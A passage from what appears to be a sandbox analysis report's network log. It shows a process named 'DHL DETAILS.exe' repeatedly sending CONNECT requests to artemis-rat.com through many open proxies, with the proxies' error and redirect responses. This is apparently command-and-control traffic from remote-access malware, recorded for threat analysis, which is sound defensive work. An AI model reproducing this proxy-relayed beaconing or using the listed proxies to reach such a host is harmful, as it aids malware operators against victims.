Mar 9, 2024 13:14:18.509867907 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1306	192.168.2.5	53899	199.188.93.214	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.362128019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1307	192.168.2.5	53847	3.212.148.199	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.363925934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.583739042 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:18 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1308	192.168.2.5	53915	185.162.228.48	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.369256020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.524985075 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1309	192.168.2.5	53888	38.54.101.254	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.369812012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.550451994 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1310	192.168.2.5	53083	128.199.187.204	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.370110989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.720602989 CET	19	IN	HTTP/1.0 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1311	192.168.2.5	53502	123.56.1.50	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.377934933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.038623095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1312	192.168.2.5	53917	164.92.86.113	54093	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.399116039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.870932102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.380410910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.474400997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1313	192.168.2.5	53800	167.71.5.83	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.405586958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.737647057 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1314	192.168.2.5	53923	172.67.250.212	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.406363010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.560884953 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1315	192.168.2.5	53803	8.217.143.187	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.407537937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1316	192.168.2.5	53443	161.97.170.209	58897	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.408366919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.473810911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1317	192.168.2.5	53792	120.78.191.225	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.408559084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.744429111 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Mar 9, 2024 13:14:18.746556044 CET	295	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1318	192.168.2.5	53804	80.67.8.6	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.421639919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1319	192.168.2.5	53806	43.155.142.116	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.421639919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1320	192.168.2.5	52368	18.166.142.180	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.422946930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1321	192.168.2.5	53897	38.162.0.221	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.422962904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.833342075 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1322	192.168.2.5	53777	221.194.149.8	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.424464941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.223869085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.534548044 CET	713	IN	HTTP/1.1 400 Bad Request Server: nginx/1.19.10 Date: Sat, 09 Mar 2024 12:14:21 GMT Content-Type: text/html Content-Length: 560 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.10</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1323	192.168.2.5	52469	90.74.184.32	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.426724911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.473810911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1324	192.168.2.5	53843	61.111.38.5	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.426728010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.900345087 CET	507	IN	HTTP/1.1 502 Proxy Error Date: Sat, 09 Mar 2024 12:14:21 GMT Server: Apache Content-Length: 341 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1325	192.168.2.5	53783	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.426915884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1326	192.168.2.5	53835	121.164.200.18	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.426918983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.161699057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1327	192.168.2.5	53837	46.17.63.166	4154	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.427398920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.747642994 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1328	192.168.2.5	53807	94.30.152.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.430653095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1329	192.168.2.5	53831	47.114.101.57	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
